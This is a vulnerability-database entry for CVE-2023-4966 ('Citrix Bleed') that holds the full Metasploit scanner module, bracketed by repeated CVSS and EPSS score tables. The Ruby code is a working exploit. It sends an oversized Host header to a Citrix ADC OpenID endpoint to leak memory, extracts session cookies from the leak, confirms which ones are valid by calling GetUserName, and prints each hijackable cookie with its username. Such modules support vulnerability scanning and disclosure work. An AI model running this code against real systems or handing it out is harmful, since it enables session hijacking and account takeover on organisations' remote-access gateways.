Dylan Pindur, Spencer McIntyreMSF:AUXILIARY-SCANNER-HTTP-CITRIX_BLEED_CVE_2023_4966-Citrix ADC (NetScaler) Bleed Scanner
7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
7.8 High
AI Score
Confidence
High
5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:N/A:N
0.967 High
EPSS
Percentile
99.6%
This module scans for a vulnerability that allows a remote, unauthenticated attacker to leak memory for a target Citrix ADC server. The leaked memory is then scanned for session cookies which can be hijacked if found.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
COOKIE_NAME = 'NSC_AAAC'.freeze
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Citrix ADC (NetScaler) Bleed Scanner',
'Description' => %q{
This module scans for a vulnerability that allows a remote, unauthenticated attacker to leak memory for a
target Citrix ADC server. The leaked memory is then scanned for session cookies which can be hijacked if found.
},
'Author' => [
'Dylan Pindur', # original assetnote writeup
'Spencer McIntyre' # metasploit module
],
'References' => [
['CVE', '2023-4966'],
['URL', 'https://www.assetnote.io/resources/research/citrix-bleed-leaking-session-tokens-with-cve-2023-4966']
],
'DisclosureDate' => '2023-10-25',
'License' => MSF_LICENSE,
'Notes' => {
'Stability' => [],
'Reliability' => [],
'SideEffects' => [],
'AKA' => ['Citrix Bleed']
},
'DefaultOptions' => { 'RPORT' => 443, 'SSL' => true }
)
)
register_options([
OptString.new('TARGETURI', [true, 'Base path', '/'])
])
end
def get_user_for_cookie(cookie)
vprint_status("#{peer} - Checking cookie: #{cookie}")
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'logon/LogonPoint/Authentication/GetUserName'),
'headers' => {
'Cookie' => "#{COOKIE_NAME}=#{cookie}"
}
)
return nil unless res&.code == 200
res.body.strip
end
def run_host(_target_host)
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'oauth/idp/.well-known/openid-configuration'),
'headers' => {
'Host' => Rex::Text.rand_text_alpha(24812),
'Connection' => 'close'
}
)
return nil unless res&.code == 200
return nil unless res.headers['Content-Type'].present?
return nil unless res.headers['Content-Type'].downcase.start_with?('application/json')
username = nil
res.body.scan(/([0-9a-f]{32,65})/i).each do |cookie|
cookie = cookie.first
username = get_user_for_cookie(cookie)
next unless username
print_good("#{peer} - Cookie: #{COOKIE_NAME}=#{cookie} Username: #{username}")
report_vuln
end
return if username
begin
JSON.parse(res.body)
rescue JSON::ParserError
print_status("#{peer} - The target is vulnerable but no valid cookies were leaked.")
report_vuln
else
print_status("#{peer} - The target does not appear vulnerable.")
end
end
def report_vuln
super(
host: rhost,
port: rport,
name: name,
refs: references
)
end
end
Related
7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
7.8 High
AI Score
Confidence
High
5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:N/A:N
0.967 High
EPSS
Percentile
99.6%